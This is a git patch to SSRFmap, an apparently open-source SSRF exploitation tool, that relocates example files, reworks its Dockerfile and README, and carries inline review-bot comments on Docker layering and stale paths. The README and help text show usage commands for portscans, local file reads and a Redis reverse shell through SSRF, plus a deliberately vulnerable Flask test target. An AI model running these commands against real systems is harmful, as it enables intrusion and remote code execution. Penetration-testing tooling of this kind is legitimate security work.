From 7a04c5bb6014424d746cd2d84abf98f714f8476d Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sat, 8 Jun 2024 20:48:06 +0200
Subject: [PATCH] Dockerfile reworked + examples
---
 .gitignore | 3 ++
 Dockerfile | 17 ++++---
 README.md | 79 ++++++++++++++++++++-------------
 {data => examples}/example.py | 7 ++-
 {data => examples}/request.txt | 0
 {data => examples}/request2.txt | 0
 {data => examples}/request3.txt | 0
 {data => examples}/request4.txt | 0
 {data => examples}/request5.txt | 0
 requirements.txt | 4 +-
 ssrfmap.py | 10 ++--
 11 files changed, 72 insertions(+), 48 deletions(-)
 rename {data => examples}/example.py (89%)
 rename {data => examples}/request.txt (100%)
 rename {data => examples}/request2.txt (100%)
 rename {data => examples}/request3.txt (100%)
 rename {data => examples}/request4.txt (100%)
 rename {data => examples}/request5.txt (100%)
diff --git a/.gitignore b/.gitignore
index c2bd74f..cd42f13 100644
--- a/.gitignore
+++ b/.gitignore
@@ -104,3 +104,6 @@ venv.bak/
 
 # mypy
 .mypy_cache/
+
+# artifacts
+127.0.0.1_5000/
diff --git a/Dockerfile b/Dockerfile
index 9803164..e8e4908 100644
--- a/Dockerfile
+++ b/Dockerfile
@@ -1,9 +1,14 @@
-FROM python:3-alpine3.10
+FROM python:3.12.4-alpine
 
-WORKDIR /opt
+WORKDIR /usr/src/app
+COPY . /usr/src/app
 
-RUN apk update && apk add git
-RUN git clone https://github.com/swisskyrepo/SSRFmap.git
-RUN cd /opt/SSRFmap && pip install -r requirements.txt
+RUN apk update && apk add curl
 
-ENTRYPOINT ["python3","/opt/SSRFmap/ssrfmap.py"]
+# Install requirements
+RUN pip install -r requirements.txt
+
+# Downgrade privileges
+USER 1000
+
+ENTRYPOINT ["python3"]
\ No newline at end of file
diff --git a/README.md b/README.md
index 8196796..7f86b00 100644
--- a/README.md
+++ b/README.md
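Review bot: `RUN apk update && apk add curl` in the Dockerfile hunk leaves the apk package index in a layer of the final image; `RUN apk add --no-cache curl` installs the same package without it, and `pip install --no-cache-dir -r requirements.txt` likewise keeps the pip download cache out of the image. Because `COPY . /usr/src/app` runs before `pip install`, every source edit invalidates the dependency layer, so copying `requirements.txt` alone first, installing, and copying the rest afterwards keeps that layer cached. Dropping to `USER 1000` is a good addition, but the tree copied into `/usr/src/app` is root-owned when the switch happens, so if the tool writes output under its working directory, as the `127.0.0.1_5000/` artifacts entry added to `.gitignore` in this commit suggests, a run without the bind mount shown in the README fails on write; `COPY --chown=1000:1000` (or a `chown` before `USER`) addresses that. The file also ends without a trailing newline.
```dockerfile
WORKDIR /usr/src/app

RUN apk add --no-cache curl

# Install requirements first so this layer survives source edits
COPY requirements.txt /usr/src/app/
RUN pip install --no-cache-dir -r requirements.txt

# Copy the tool itself, owned by the unprivileged runtime user
COPY --chown=1000:1000 . /usr/src/app

# … unchanged: USER 1000, ENTRYPOINT …
```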
@@ -45,37 +45,45 @@ The following modules are already implemented and can be used with the `-m` argu ## Install and Manual -Basic install from the Github repository. +* From the Github repository. + ```powershell + $ git clone https://github.com/swisskyrepo/SSRFmap + $ cd SSRFmap/ + $ pip3 install -r requirements.txt + $ python3 ssrfmap.py -```powershell -$ git clone https://github.com/swisskyrepo/SSRFmap -$ cd SSRFmap/ -$ pip3 install -r requirements.txt -$ python3 ssrfmap.py + usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER] + [-v [VERBOSE]] [--lhost LHOST] [--lport LPORT] + [--uagent USERAGENT] [--ssl [SSL]] [--level [LEVEL]] - usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER] - [-v [VERBOSE]] [--lhost LHOST] [--lport LPORT] - [--uagent USERAGENT] [--ssl [SSL]] [--level [LEVEL]] + optional arguments: + -h, --help show this help message and exit + -r REQFILE SSRF Request file + -p PARAM SSRF Parameter to target + -m MODULES SSRF Modules to enable + -l HANDLER Start an handler for a reverse shell + -v [VERBOSE] Enable verbosity + --lhost LHOST LHOST reverse shell + --lport LPORT LPORT reverse shell + --uagent USERAGENT User Agent to use + --ssl [SSL] Use HTTPS without verification + --proxy PROXY Use HTTP(s) proxy (ex: http://localhost:8080) + --level [LEVEL] Level of test to perform (1-5, default: 1) + ``` + +* Docker + ```powershell + $ git clone https://github.com/swisskyrepo/SSRFmap + $ docker build --no-cache -t ssrfmap . 
+ $ docker run -it ssrfmap ssrfmap.py [OPTIONS] + $ docker run -it -v $(pwd):/usr/src/app ssrfmap ssrfmap.py + ``` - optional arguments: - -h, --help show this help message and exit - -r REQFILE SSRF Request file - -p PARAM SSRF Parameter to target - -m MODULES SSRF Modules to enable - -l HANDLER Start an handler for a reverse shell - -v [VERBOSE] Enable verbosity - --lhost LHOST LHOST reverse shell - --lport LPORT LPORT reverse shell - --uagent USERAGENT User Agent to use - --ssl [SSL] Use HTTPS without verification - --proxy PROXY Use HTTP(s) proxy (ex: http://localhost:8080) - --level [LEVEL] Level of test to perform (1-5, default: 1) -``` ## Examples First you need a request with a parameter to fuzz, Burp requests works well with SSRFmap. -They should look like the following. More examples are available in the **/data** folder. +They should look like the following. More examples are available in the **./examples** folder. ```powershell POST /ssrf HTTP/1.1 
@@ -97,21 +105,21 @@ Use the `-m` followed by module name (separated by a `,` if you want to launch s ```powershell # Launch a portscan on localhost and read default files -python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan +python ssrfmap.py -r examples/request.txt -p url -m readfiles,portscan ``` If you need to have a custom user-agent use the `--uagent`. Some targets will use HTTPS, you can enable it with `--ssl`. ```powershell # Launch a portscan against an HTTPS endpoint using a custom user-agent -python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent" +python ssrfmap.py -r examples/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent" ``` Some modules allow you to create a connect back, you have to specify LHOST and LPORT. Also SSRFmap can listen for the incoming reverse shell. ```powershell # Triggering a reverse shell on a Redis -python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242 +python ssrfmap.py -r examples/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242 # -l create a listener for reverse shell on the specified port # --lhost and --lport work like in Metasploit, these values are used to create a reverse shell payload @@ -127,10 +135,19 @@ When the target is protected by a WAF or some filters you can try a wide range o A quick way to test the framework can be done with `data/example.py` SSRF service. -```powershell -FLASK_APP=data/example.py flask run & -python ssrfmap.py -r data/request.txt -p url -m readfiles -``` +* Local + ```powershell + FLASK_APP=examples/example.py flask run & + python ssrfmap.py -r examples/request.txt -p url -m readfiles + ``` + +* Docker + ```ps1 + docker build --no-cache -t ssrfmap . + docker run -it -v $(pwd):/usr/src/app --name example ssrfmap examples/example.py + docker exec -it example python ssrfmap.py -r examples/request.txt -p url -m readfiles + ``` + ## Contribute 
diff --git a/data/example.py b/examples/example.py
similarity index 89%
rename from data/example.py
rename to examples/example.py
index ddacbba..b255b98 100644
--- a/data/example.py
+++ b/examples/example.py
@@ -1,9 +1,8 @@
-# NOTE: do not try this at home - highly vulnerable ! (SSRF and RCE)
-# NOTE: this file should become a simple ssrf example in order to test SSRFmap
+# NOTE: Do not try this at home - highly vulnerable ! (SSRF and RCE)
+# NOTE: SSRF examples script
 # FLASK_APP=example.py flask run
 
-from flask import Flask, abort, request
-import json
+from flask import Flask, request
 import re
 import subprocess
 
diff --git a/data/request.txt b/examples/request.txt
similarity index 100%
rename from data/request.txt
rename to examples/request.txt
diff --git a/data/request2.txt b/examples/request2.txt
similarity index 100%
rename from data/request2.txt
rename to examples/request2.txt
diff --git a/data/request3.txt b/examples/request3.txt
similarity index 100%
rename from data/request3.txt
rename to examples/request3.txt
diff --git a/data/request4.txt b/examples/request4.txt
similarity index 100%
rename from data/request4.txt
rename to examples/request4.txt
diff --git a/data/request5.txt b/examples/request5.txt
similarity index 100%
rename from data/request5.txt
rename to examples/request5.txt
diff --git a/requirements.txt b/requirements.txt
index 75e0c0d..f753748 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -1,2 +1,2 @@
-Flask==2.3.2
-requests==2.21.0
+Flask==3.0.3
+requests==2.31.0
diff --git a/ssrfmap.py b/ssrfmap.py
index 852acf4..e33ba34 100644
--- a/ssrfmap.py
+++ b/ssrfmap.py
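Review bot: The context line `# FLASK_APP=example.py flask run` in the example.py hunk is stale now that the file lives under `examples/`; the README in this same commit runs it as `FLASK_APP=examples/example.py flask run`, and the comment should match. The new `# NOTE: SSRF examples script` says less than the line it replaces; a comment along the lines of `# NOTE: Intentionally vulnerable Flask target for exercising SSRFmap - run it on localhost or in the provided container only` tells a reader what the file is for and how it is meant to be run. Dropping `abort` and `json` from the imports is only safe if no use of either remains further down the file, which lies outside this hunk.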
@@ -17,11 +17,11 @@ def display_banner():
 
 def parse_args():
 example_text = '''Examples:
- python ssrfmap.py -r data/request2.txt -p url -m portscan
- python ssrfmap.py -r data/request.txt -p url -m redis
- python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
- python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
- python ssrfmap.py -r data/request.txt -p url -m readfiles --rfiles
+ python ssrfmap.py -r examples/request2.txt -p url -m portscan
+ python ssrfmap.py -r examples/request.txt -p url -m redis
+ python ssrfmap.py -r examples/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
+ python ssrfmap.py -r examples/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
+ python ssrfmap.py -r examples/request.txt -p url -m readfiles --rfiles
 '''
 parser = argparse.ArgumentParser(epilog=example_text, formatter_class=argparse.RawDescriptionHelpFormatter)
 parser.add_argument('-r', action ='store', dest='reqfile', help="SSRF Request file")
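Review bot: The `data/` to `examples/` path update in `example_text` is not applied everywhere in this commit: README.md still carries the context line ``A quick way to test the framework can be done with `data/example.py` SSRF service.`` in its third hunk, which should read `examples/example.py`. The epilog and the README usage block also already differ, since the epilog demonstrates `--rfiles` while the README's option list in this commit does not mention it; keeping the two lists aligned, or generating one from the other, would stop this kind of drift. `parse_args` continues past the end of the hunk.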